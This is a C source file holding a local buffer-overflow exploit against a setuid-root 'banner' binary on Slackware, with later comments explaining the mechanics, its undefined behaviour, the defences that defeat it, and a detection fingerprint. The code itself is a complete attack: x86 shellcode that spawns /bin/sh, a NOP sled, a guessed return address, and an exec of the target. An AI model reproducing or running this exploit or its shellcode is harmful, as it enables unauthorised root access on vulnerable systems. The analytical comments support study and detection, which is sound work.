/***********************************************
 * released under (E) licensing ...            *
 *        (E) RULES AND REGULATIONS            *
 * permission to use/rewrite/add     : granted *
 * permission to trojan/steal        : denied  *
 * permission to use illegally       : denied  *
 * permission to use on /dev/urandom : denied  *
 ***********************************************/
/* contact el8@press.co.jp for full license    */
/* code copyrighted by ~el8 -- don't infringe! */

/*
 *  banner.c exploit
 *  lore
 *
 *  banner exploit which works with all versions of slackware
 *
 *  Note: banner has to be setuid root (30% of systems I ran across had
 *  banner installed suid root)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Payload bytes that main() places in the argument handed to the target.
 * Judging by the byte values these are raw 32-bit x86 machine code in the
 * jmp/call/pop style, ending in `int 0x80` system calls, followed by the
 * literal "/bin/sh" and a run of '.' bytes that presumably serve as
 * scratch space the code overwrites at run time -- inferred from the
 * bytes, not verified here.  No byte is 0x00, so the strlen(hellcode)
 * calls in main() measure the whole array up to the implicit NUL.
 * For detection purposes: the "/bin/sh" literal preceded by the long 0x90
 * filler main() prepends is the classic fingerprint of this kind of argv
 * overflow payload and is straightforward to match in execve() auditing.
 */
char            hellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh.........";

/*
 * From banner.c
 *
 * Sizes copied from the target's source.  Per that note MAXSEG/BSIZE is
 * a buffer size inside banner; the unchecked copy into that buffer is
 * not on this page, so its exact shape is assumed, not shown.
 */
#define MAXSEG (1024)

#define BSIZE  (MAXSEG)
/*
 * One argument of BSIZE + 8 bytes: enough to fill a 1024-byte buffer and
 * clobber 8 bytes past it.  main() stores a 4-byte address in the last
 * four of those, which lines up with an i386 frame (saved %ebp, then the
 * return address) -- inferred from this layout, not from banner's source.
 */
#define ESIZE  ((BSIZE+8))
/* Target binary; the header comment says it must be setuid root. */
#define PATH   ("/usr/bin/banner")
/* Default distance subtracted from this process's %esp; argv[1] overrides it. */
#define OFFSET (400)
/* x86 single-byte `nop`; used as filler so an inexact address guess still lands on code. */
#define NOP    (0x90)

/*
 * `__P()` is the old BSD <sys/cdefs.h> prototype wrapper.  It is not
 * defined in this file, so the build relies on a libc whose headers still
 * define it and leak it through <stdio.h>; modern toolchains generally
 * reject these two lines.  There is no prototype for execl() at all
 * (<unistd.h> is not included).
 */
int main        __P((int, char **));
long get_esp    __P((void));

/*
 * Returns this process's stack pointer, used in main() as a proxy for
 * where the target's stack will be.  The asm copies %esp into %eax and the
 * function then reaches its closing brace with no C `return`, relying on
 * %eax being the i386 return register.  Using the result of a non-void
 * function that ends without returning is undefined behaviour, and the
 * trick also assumes the i386 ABI: on x86-64 `long` is 8 bytes and %esp
 * is only the low half of %rsp, so the value is truncated.  With stack
 * ASLR the number differs on every run regardless, which is why this
 * listing is of historical rather than practical interest.
 */
long
get_esp(void)
{
    __asm__("movl %esp, %eax");
}

/*
 * Builds one ESIZE-byte argument for the target and execs it.
 * Layout of evilbanner (ESIZE = 1032, see the #defines above):
 *   [0 .. ESIZE-strlen(hellcode)-5]   0x90 filler
 *   [.. ESIZE-5]                      hellcode bytes (its NUL is not copied)
 *   [ESIZE-4 .. ESIZE-1]              guessed stack address (addr)
 * This only does anything if PATH is a setuid-root banner that copies its
 * argument into a fixed-size buffer without a length check (the header
 * comment asserts this; that code is not on this page), and it further
 * presupposes a 32-bit x86 target with an executable, non-randomised
 * stack and no stack protector.  Any one of NX, ASLR, -fstack-protector,
 * or simply not installing banner setuid defeats it; a ~1 KiB run of
 * 0x90 followed by "/bin/sh" in an execve() argument is also trivial for
 * execve auditing to flag.
 *
 * Returns: nothing meaningful.  On success execl() replaces this process
 * image; on failure the error is ignored and main() falls off its end
 * (C99 treats that as returning 0).
 */
int
main(int argc, char **argv)
{
    int             offset,         /* bytes subtracted from this process's %esp */
                    i,              /* write cursor into evilbanner */
                    j;              /* read cursor into hellcode */
    long            addr;           /* guessed address of the filler inside the target */
    char           *evilbanner;     /* the argument passed to PATH; heap, never freed */

    /* Unchecked: a NULL from malloc() would fault in the first loop below. */
    evilbanner = (char *) malloc(ESIZE);
    offset = OFFSET;

    /*
     * Fill everything except the final strlen(hellcode)+4 bytes with NOP.
     * strlen() yields size_t, so the comparison is unsigned; that is only
     * safe because ESIZE - 4 is larger than strlen(hellcode).
     */
    for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
        evilbanner[i] = NOP;

    /* Append hellcode directly after the filler, stopping 4 bytes short. */
    for (j = 0; i < (ESIZE - 4); ++j, ++i)
        evilbanner[i] = hellcode[j];

    /* atoi() reports no errors: a non-numeric argv[1] silently becomes 0. */
    if (argc > 1)
        offset = atoi(argv[1]);

    /*
     * Assumes the target's stack sits near this process's, `offset` bytes
     * lower.  get_esp() itself is undefined behaviour (no return statement).
     */
    addr = (get_esp() - offset);

    /*
     * Stores sizeof(long) bytes at evilbanner[ESIZE-4]: exactly the last
     * 4 bytes on ILP32, but on LP64 `long` is 8 bytes and this overruns
     * the allocation by 4.  No terminating NUL is ever written, so the
     * string execl() passes on ends wherever the heap happens to hold a
     * zero byte.  The cast is also a strict-aliasing violation.
     */
    *(long *) (evilbanner + i) = addr;


    fprintf(stderr, "banner exploit, lore\n");
    /* %x expects unsigned int but addr is long -- mismatched on LP64. */
    fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);

    /*
     * execl() has no prototype here (<unistd.h> is not included), which
     * is an implicit declaration -- an error in C99 and later.  Its
     * return value, i.e. failure to exec, is not checked.
     */
    execl(PATH, "banner", evilbanner, NULL);
}

